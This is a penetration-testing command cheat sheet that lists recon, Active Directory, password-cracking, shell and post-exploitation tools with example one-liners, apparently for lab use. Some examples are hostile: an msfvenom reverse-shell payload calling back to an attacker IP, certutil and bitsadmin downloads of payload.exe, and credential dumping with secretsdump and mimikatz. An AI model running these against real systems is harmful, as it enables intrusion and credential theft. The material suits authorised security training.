Command Overview
1) Recon, Scanning, and Enumeration
| Command | Description | Typical Use | Example |
|---|---|---|---|
nmap | Network scanner for host discovery, port scanning, service detection, and NSE script checks. | Baseline target recon and service fingerprinting. | nmap -sC -sV -p- -oA full_scan 10.10.10.10 |
ffuf | Fast web fuzzer for directories, files, parameters, and virtual hosts. | Enumerate hidden HTTP attack surface. | ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://target/FUZZ -mc 200,301,302 |
gobuster | Brute-force utility for web content, DNS subdomains, and vhosts. | Discovery when directory listing is disabled or DNS space is unknown. | gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -x php,txt |
wfuzz | Flexible web fuzzer for payload placement in URL, headers, body, or auth fields. | Parameter fuzzing and endpoint behavior analysis. | wfuzz -c -w words.txt -u 'http://target/page.php?id=FUZZ' --hc 404 |
nikto | Web scanner focused on known dangerous files, weak configs, and old server issues. | Quick web hygiene/misconfiguration checks. | nikto -h http://target -o nikto.txt |
sqlmap | Automated SQL injection detection and exploitation framework. | Test injectable params and extract DB data where permitted. | sqlmap -u 'http://target/item.php?id=1' -p id --batch --dbs |
enum4linux | SMB/NetBIOS enumeration helper for users, shares, groups, and policy details. | Initial AD/Windows recon from Linux. | enum4linux -a 10.10.10.20 |
ldapsearch | LDAP query client for retrieving directory objects and attributes. | Enumerate users/groups/computers in AD or LDAP. | ldapsearch -x -H ldap://dc.domain.local -b 'DC=domain,DC=local' '(objectClass=user)' |
dig | DNS query tool with precise control over resolver, record type, and output. | DNS troubleshooting and infrastructure mapping. | dig @10.10.10.53 target.domain.local A +short |
nslookup | Simple DNS lookup utility. | Quick hostname/IP checks. | nslookup target.domain.local 10.10.10.53 |
ping | ICMP reachability and latency test. | Verify basic network path availability. | ping -c 4 10.10.10.1 |
linpeas | Linux privilege-escalation enumeration script (PEASS project). | Local post-exploitation triage for weak permissions/configs. | ./linpeas.sh |
2) Web and API Interaction
| Command | Description | Typical Use | Example |
|---|---|---|---|
curl | Versatile HTTP client for GET/POST/PUT, custom headers, auth, uploads, and automation. | Reproduce API calls and test endpoint behavior. | curl -i -X POST http://target/api/login -H 'Content-Type: application/json' -d '{"user":"a","pass":"b"}' |
wget | Command-line downloader for files and recursive site retrieval. | Pull payloads, backups, logs, or static content. | wget -O backup.zip http://target/files/backup.zip |
3) Remote Access and Pivoting
| Command | Description | Typical Use | Example |
|---|---|---|---|
ssh | Secure shell for remote login and encrypted tunneling. | Initial shell access and port forwarding. | ssh -i id_rsa [email protected] |
scp | File transfer over SSH. | Upload tools/download loot quickly. | scp -i id_rsa tool.sh [email protected]:/tmp/ |
sftp | Interactive file transfer session over SSH. | Browse and transfer files in restricted shells. | sftp [email protected] |
ftp | Interactive FTP client. | Access legacy exposed FTP services. | ftp 10.10.10.20 |
evil-winrm | WinRM shell client for remote PowerShell sessions. | Windows foothold/lateral movement with valid creds or hashes. | evil-winrm -i 10.10.10.20 -u Administrator -p 'Password123!' |
evil-winrm-py | Environment/package variant name for Evil-WinRM. | Same use case as evil-winrm when installed with this entry point. | evil-winrm-py -i 10.10.10.20 -u admin -H <NTLM_HASH> |
rdesktop | Legacy Linux RDP client. | Basic GUI access to Windows hosts. | rdesktop -u user -p 'Password123!' 10.10.10.20 |
xfreerdp | Full-featured RDP client. | Stable RDP with modern auth/display options. | xfreerdp /v:10.10.10.20 /u:user /p:'Password123!' /cert:ignore |
proxychains | Routes TCP tools through chained SOCKS/HTTP proxies. | Operate tools through pivots without native proxy support. | proxychains nmap -sT -Pn 10.10.20.10 |
chisel | Fast TCP tunneling utility with reverse and SOCKS modes. | Build pivots in segmented networks. | chisel server -p 9001 --reverse and chisel client 10.10.14.5:9001 R:socks |
sshuttle | VPN-like user-space tunnel over SSH. | Route entire subnets via a compromised jump host. | sshuttle -r [email protected] 10.10.20.0/24 |
plink | PuTTY command-line SSH client (common on Windows). | Create remote/local forwards from Windows footholds. | plink -l user -pw pass 10.10.10.10 -R 8080:127.0.0.1:80 |
autossh | Monitored SSH launcher that auto-recovers dropped tunnels. | Keep long-lived pivot tunnels alive. | autossh -M 20000 -f -N -L 8080:127.0.0.1:80 [email protected] |
4) SMB, AD, and Impacket Workflow
| Command | Description | Typical Use | Example |
|---|---|---|---|
nxc | NetExec for SMB/LDAP/WinRM auth testing and enumeration. | Credential validation and broad AD surface checks. | nxc smb 10.10.10.0/24 -u users.txt -p passwords.txt --shares |
crackmapexec | Original CME command name used in many older workflows. | Same class of tasks as nxc. | crackmapexec smb 10.10.10.0/24 -u user -p pass |
smbclient | Native SMB client for listing/mount-like access to shares. | Browse and download files from network shares. | smbclient -L //10.10.10.20 -U user |
rpcclient | RPC interface client for Windows/AD enumeration. | User/group/SID/domain info retrieval. | rpcclient -U '' -N 10.10.10.20 |
impacket-smbclient | Impacket SMB client with flexible auth options. | SMB access with hashes/Kerberos in offensive workflows. | impacket-smbclient domain/user:[email protected] |
impacket-secretsdump | Dumps credential material from SAM/LSA/NTDS contexts. | DCSync or local secret extraction where rights permit. | impacket-secretsdump -just-dc-user Administrator domain/user:[email protected] |
impacket-getnpusers | AS-REP roasting helper for pre-auth disabled accounts. | Extract crackable AS-REP hashes. | impacket-getnpusers domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat -outputfile asrep.txt |
impacket-getuserspns | Kerberoasting helper for SPN-bearing accounts. | Request TGS hashes for offline cracking. | impacket-getuserspns domain.local/user:pass -dc-ip 10.10.10.10 -request |
impacket-gettgt | Requests a Kerberos TGT and writes a ccache ticket. | Kerberos-authenticated follow-up actions. | impacket-gettgt domain.local/user:pass -dc-ip 10.10.10.10 |
impacket-getST | Requests service tickets, including impersonation/S4U flows. | Delegation and RBCD chains. | impacket-getST -spn 'cifs/dc01.domain.local' -impersonate Administrator 'domain.local/machine$:MachinePass!' |
impacket-psexec | Remote command execution via SMB service creation. | Admin-level remote shell on Windows. | impacket-psexec domain/user:[email protected] |
psexec.py | Alternate script entry name for Impacket PsExec. | Same as impacket-psexec. | psexec.py domain/user:[email protected] |
impacket-wmiexec | Remote command execution via WMI. | Lower-noise alternative to service-based exec in some environments. | impacket-wmiexec domain/user:[email protected] |
wmiexec.py | Script-name variant of Impacket WMI exec. | Same as impacket-wmiexec. | wmiexec.py domain/user:[email protected] |
impacket-rpcmap | RPC endpoint/interface probing utility. | Enumerate MSRPC/DCOM exposure. | impacket-rpcmap ncacn_ip_tcp:10.10.10.20[135] -brute-uuids |
impacket-rpcdump | Dumps RPC endpoint mapper registrations. | Service fingerprinting and attack-path planning. | impacket-rpcdump 10.10.10.20 |
impacket-reg | Remote registry query/modify tool. | Read configs/secrets or alter persistence keys with valid rights. | impacket-reg domain/user:[email protected] query -keyName HKLM\\SOFTWARE |
impacket-owneredit | Modifies AD object ownership. | ACL abuse chains where owner change unlocks write operations. | impacket-owneredit -action write -new-owner attacker -target victim 'domain.local/user:pass' |
impacket-dacledit | Reads/writes AD DACL permissions. | Grant rights like GenericAll/FullControl during delegated abuse. | impacket-dacledit -action write -rights FullControl -principal attacker -target victim 'domain.local/user:pass' |
impacket-mssqlclient | SQL Server client from Impacket. | Query MSSQL, run procedures, and test server-side attack paths. | impacket-mssqlclient domain/user:[email protected] |
impacket-addcomputer | Adds machine accounts in AD when quota/policy allows. | Prepare machine account for ADCS/RBCD attacks. | impacket-addcomputer -dc-ip 10.10.10.10 -computer-name atkbox domain.local/user:pass |
impacket-dpapi | DPAPI decryption helper for masterkeys/credentials/vault artifacts. | Recover secrets from Windows protected blobs. | impacket-dpapi masterkey -file key -password 'UserPassword!' |
impacket-ticketer | Generates forged Kerberos tickets with supplied keying material. | Advanced ticket forgery scenarios. | impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <SID> -domain domain.local administrator |
impacket-passthecert.py | Certificate-authenticated AD action utility (Pass-the-Cert workflows). | LDAP attribute modifications after ADCS abuse. | python3 impacket-passthecert.py -action write_rbcd -crt cert.crt -key cert.key -domain domain.local -dc-ip 10.10.10.10 |
certipy-ad | ADCS enumeration and abuse framework. | Identify vulnerable templates and request/abuse certificates. | certipy-ad find -u [email protected] -p 'Password123!' -dc-ip 10.10.10.10 -vulnerable |
kerbrute | Kerberos username enumeration and password spraying tool. | Validate AD usernames without full LDAP bind. | kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt |
responder | Poisoning/capture tool for LLMNR/NBT-NS/mDNS environments. | Capture NTLM challenge-response traffic in internal networks. | responder -I tun0 -wd |
ntlmrelayx | NTLM relay framework for relaying captured auth to target services. | Relay attacks where signing/protections are weak. | ntlmrelayx.py -tf targets.txt -smb2support |
bloodhound | Graph analysis platform for AD privilege path discovery. | Visualize ACL/delegation/session relationships. | bloodhound |
bloodhound-ce-python | Linux-friendly collector for BloodHound CE ingestion. | Collect AD graph data from an attack host. | bloodhound-ce-python -c all -u user -p pass -d domain.local -dc dc01.domain.local --dns-tcp |
sharphound | Native Windows AD collector feeding BloodHound. | Domain data collection from joined hosts. | SharpHound.exe -c All -d domain.local |
powerview | PowerShell AD recon toolkit. | Deep object/ACL/group membership analysis. | Get-DomainUser -SPN |
rubeus | Kerberos operations toolkit (ticket requests, roast, PTT). | Ticket abuse and Kerberos credential operations on Windows. | Rubeus.exe kerberoast /outfile:hashes.txt |
mimikatz | Credential/ticket extraction and token manipulation framework. | Post-exploitation credential access and Kerberos operations. | sekurlsa::logonpasswords |
bloodyAD | AD object and ACL abuse command-line tool. | Ownership/DACL manipulation and delegated rights abuse. | bloodyAD -d domain.local -u user -p 'Password123!' --host dc01.domain.local set owner victim attacker |
pth-net | Pass-the-hash-enabled Samba net variant. | Remote account operations when only hashes are available. | pth-net rpc password 'targetuser' 'NewPass123!' -U 'domain/user%LMHASH:NTHASH' -S dc01.domain.local |
5) Password, Hash, and Wordlist Operations
| Command | Description | Typical Use | Example |
|---|---|---|---|
hashcat | GPU-accelerated password/hash cracking engine. | Crack NTLM, Kerberos, bcrypt, and many other hash formats. | hashcat -m 13100 -a 0 tgs.hash rockyou.txt |
john | CPU-focused hash cracking tool with robust format support. | Crack transformed hashes from vaults/archives/password stores. | john --wordlist=rockyou.txt hashes.txt |
hydra | Online brute-force tool for many network protocols. | Credential spraying against SSH/FTP/HTTP auth services. | hydra -L users.txt -P passes.txt ssh://10.10.10.10 |
medusa | Parallel online password attack tool similar to Hydra. | Service brute forcing with module-specific behavior. | medusa -h 10.10.10.10 -U users.txt -P passes.txt -M ssh |
crunch | Custom wordlist generator by length/pattern/charset. | Build targeted password candidates from known patterns. | crunch 8 8 -t Summer%%%% -o custom.txt |
cewl | Wordlist generator from website content scraping. | Context-aware password candidate generation. | cewl -d 2 -m 5 http://target -w words.txt |
ansible2john | Converts Ansible Vault blobs to John-crackable format. | Recover vault passwords from leaked Ansible secrets. | ansible2john vault_blob.txt > ansible.hash |
pwsafe2john | Converts .psafe3 files into John input format. | Crack Password Safe database master passwords. | pwsafe2john backup.psafe3 > psafe.hash |
gpg2john | Converts GPG-protected key material for John workflows. | Recover passphrases for encrypted GPG keys. | gpg2john private.key > gpg.hash |
ntlm_theft.py | Generates lure files that trigger outbound NTLM authentication. | Capture challenge-response with responder in controlled tests. | python3 ntlm_theft.py -g all -f lure -s 10.10.14.5 |
6) Exploitation, Shells, and C2
| Command | Description | Typical Use | Example |
|---|---|---|---|
msfconsole | Metasploit interactive framework console. | Manage exploit modules, payload handlers, and sessions. | msfconsole -q |
msfvenom | Payload generation and encoding utility. | Build test payloads in exe/elf/raw formats. | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8443 -f exe -o shell.exe |
meterpreter | Advanced Metasploit shell/session with post modules. | Post-exploitation actions and pivoting. | meterpreter > sysinfo |
netcat | TCP/UDP utility for listeners, clients, and simple relays. | Reverse shell handlers and quick connectivity checks. | netcat -lvnp 4444 |
nc | Common binary name for netcat. | Same use cases as netcat. | nc -vz 10.10.10.10 445 |
socat | Multi-protocol relay/tunnel tool with rich endpoint options. | Stable forwarding and TTY-compatible relays. | socat TCP-LISTEN:9001,fork TCP:10.10.20.15:3389 |
rlwrap | Wraps interactive tools with history and line editing. | Improve shell UX for basic reverse shells. | rlwrap nc -lvnp 4444 |
7) Windows Administration and Post-Exploitation
| Command | Description | Typical Use | Example |
|---|---|---|---|
powershell | Windows automation/scripting shell. | Host recon, AD ops, script execution, post tasks. | powershell -NoProfile -ExecutionPolicy Bypass -File script.ps1 |
pwsh | PowerShell 7+ runtime (cross-platform). | Newer PowerShell features on Linux/macOS/Windows. | pwsh -c 'Get-Process | Select-Object -First 5' |
cmd | Classic Windows command interpreter. | Execute legacy command sequences and batch actions. | cmd /c whoami && ipconfig |
net | Windows account/share/domain management command family. | User/group operations and share mapping. | net user testuser Password123! /add |
netsh | Windows network stack/firewall configuration utility. | Firewall review, portproxy setup, interface changes. | netsh advfirewall firewall show rule name=all |
reg | Registry read/write utility. | Query autoruns, policy keys, and persistence-related paths. | reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run |
wmic | Legacy WMI command-line interface. | Gather host/process/patch data on older environments. | wmic qfe get Caption,InstalledOn |
runas | Run a command as another Windows user. | Validate alternate credentials interactively. | runas /user:DOMAIN\\admin cmd |
schtasks | Scheduled task management CLI. | Create/query/run scheduled jobs locally/remotely. | schtasks /query /fo LIST /v |
certutil | Certificate utility often used for file transfer/encoding tasks. | Download/decode files in constrained environments. | certutil -urlcache -f http://10.10.14.5/tool.exe tool.exe |
bitsadmin | Background transfer management utility. | Background downloads/uploads on Windows. | bitsadmin /transfer myjob /download /priority normal http://10.10.14.5/payload.exe C:\\Temp\\payload.exe |
msbuild | .NET build engine. | Compile .NET projects and execute build targets. | msbuild project.csproj /p:Configuration=Release |
8) Linux and Core CLI Operations
| Command | Description | Typical Use | Example |
|---|---|---|---|
cat | Prints file content to stdout. | View configs, logs, and extracted files. | cat /etc/passwd |
ls | Lists directory contents. | File system exploration and permission checks. | ls -lah /var/www |
find | Recursive filesystem search by name, type, perm, size, or time. | Locate sensitive files and writable paths. | find / -type f -name '*.conf' 2>/dev/null |
grep | Pattern matching in text streams/files. | Search large datasets for credentials, keys, or indicators. | grep -Rin 'password' . |
awk | Field-based text processing language. | Parse structured output quickly. | awk -F: '{print $1}' /etc/passwd |
sed | Stream editor for substitutions and line transforms. | Inline cleanup/reformatting in pipelines. | sed -n '1,20p' file.txt |
cut | Extract selected fields/columns from text. | Pull usernames, IDs, or specific delimited fields. | cut -d: -f1 /etc/passwd |
sort | Sorts text lines. | Normalize lists for deduplication and comparison. | sort users.txt |
uniq | Collapses adjacent duplicate lines. | Remove duplicates from sorted data. | sort users.txt | uniq -c |
xargs | Builds command invocations from stdin input. | Batch actions across discovered targets/files. | cat hosts.txt | xargs -I{} ping -c 1 {} |
tee | Writes output to terminal and file at the same time. | Keep command logs while watching live output. | nmap -sV 10.10.10.10 | tee scan.txt |
chmod | Changes file mode bits (permissions/SUID/SGID/sticky). | Make scripts executable or adjust file access. | chmod +x script.sh |
chown | Changes file owner and group. | Correct ownership for moved/generated files. | chown root:root sensitive.txt |
tar | Archive create/extract utility. | Package or unpack bulk files. | tar -czvf backup.tar.gz /etc |
zip | Creates ZIP archives. | Bundle files for transfer or upload. | zip -r out.zip folder/ |
unzip | Extracts ZIP archives. | Inspect downloaded bundles. | unzip archive.zip -d outdir |
7z | 7-Zip CLI supporting multiple archive formats. | Handle password-protected or uncommon archives. | 7z x backup.7z -ooutdir |
objcopy | Binary section/symbol manipulation utility. | Extract or inject ELF/PE sections during binary analysis. | objcopy --add-section .text_sig=sig.bin payload.bin |
ntpdate | Manual one-time NTP sync. | Correct time skew before Kerberos operations. | ntpdate 10.10.10.10 |
timedatectl | Time/date/NTP manager for systemd hosts. | Toggle NTP automation or inspect time state. | timedatectl set-ntp true |
rdate | Sets time from remote RFC 868 server. | Lab fallback for fast clock correction. | rdate -n 10.10.10.10 |
9) Programming, Build, and DevOps Tooling
| Command | Description | Typical Use | Example |
|---|---|---|---|
python | Python interpreter for scripts and one-liners. | Automation, exploit PoCs, lightweight HTTP servers. | python -m http.server 8000 |
python3 | Explicit Python 3 interpreter. | Ensure modern interpreter path in mixed environments. | python3 script.py --help |
pip | Python package installer. | Install Python dependencies for tooling. | pip install requests |
pip3 | Python 3 package installer. | Install modules into Python 3 environment. | pip3 install impacket |
perl | General-purpose scripting language. | Fast regex/text transformations. | perl -ne 'print if /admin/i' users.txt |
ruby | Scripting/runtime environment used by some offensive tools. | Run Ruby-based utilities and helpers. | ruby -v |
gcc | GNU C/C++ compiler. | Compile native helper binaries or PoCs. | gcc exploit.c -o exploit |
make | Build automation tool using Makefiles. | Compile/install multi-file projects quickly. | make all |
git | Version control and repository history tooling. | Review commit history, recover deleted secrets, track changes. | git log --oneline --all |
docker | Container runtime and image build system. | Spin up test services and isolated tooling. | docker run --rm -it ubuntu:22.04 bash |
terraform | IaC tool for provisioning from HCL config. | Apply/plan cloud or local infrastructure state. | terraform -chdir=/opt/example apply |
dotnet | .NET SDK CLI for project creation/build/run. | Compile C# tooling or test .NET code paths. | dotnet new console -n TestProject && dotnet build TestProject |
10) Cloud, Database, Crypto, and Services
| Command | Description | Typical Use | Example |
|---|---|---|---|
aws | AWS CLI for identity, compute, storage, and service APIs. | Enumerate cloud identity and resource access. | aws sts get-caller-identity |
az | Azure CLI for tenant/subscription/resource actions. | Validate active Azure context and permissions. | az account show |
mysql | MySQL/MariaDB command-line client. | Query app databases and inspect credential tables. | mysql -h 10.10.10.30 -u app -p |
mongo | MongoDB shell client. | Enumerate databases/collections and run queries. | mongo mongodb://10.10.10.40:27017 |
kinit | Obtains Kerberos TGT for a principal. | Start Kerberos-authenticated sessions on Linux. | kinit [email protected] |
klist | Lists cached Kerberos tickets. | Verify ticket presence/expiry. | klist |
kdestroy | Clears Kerberos ticket cache. | Reset auth context between identities. | kdestroy |
gpg | GNU Privacy Guard for encryption, decryption, and keyring management. | Decrypt backup/keyvault artifacts and inspect key metadata. | gpg --homedir . --out data.txt --decrypt data.gpg |
ansible-vault | Encrypt/decrypt secret files used by Ansible. | Recover plaintext from leaked vault files if vault password is known. | ansible-vault decrypt secrets.yml |
consul | HashiCorp Consul service discovery/configuration CLI. | Reload/check service configs in Consul-managed environments. | consul reload --token <CONSUL_TOKEN> |
bbot | OSINT automation framework with pluggable modules. | Automated recon pipelines and custom module execution. | bbot -p /home/user/preset.yml -m whois -t example.com |
sendemail | SMTP command-line mail sender. | Test mail delivery flows and crafted message behavior. | sendemail -s 10.10.10.25 -f [email protected] -t [email protected] -u 'Test' -m 'Hello' |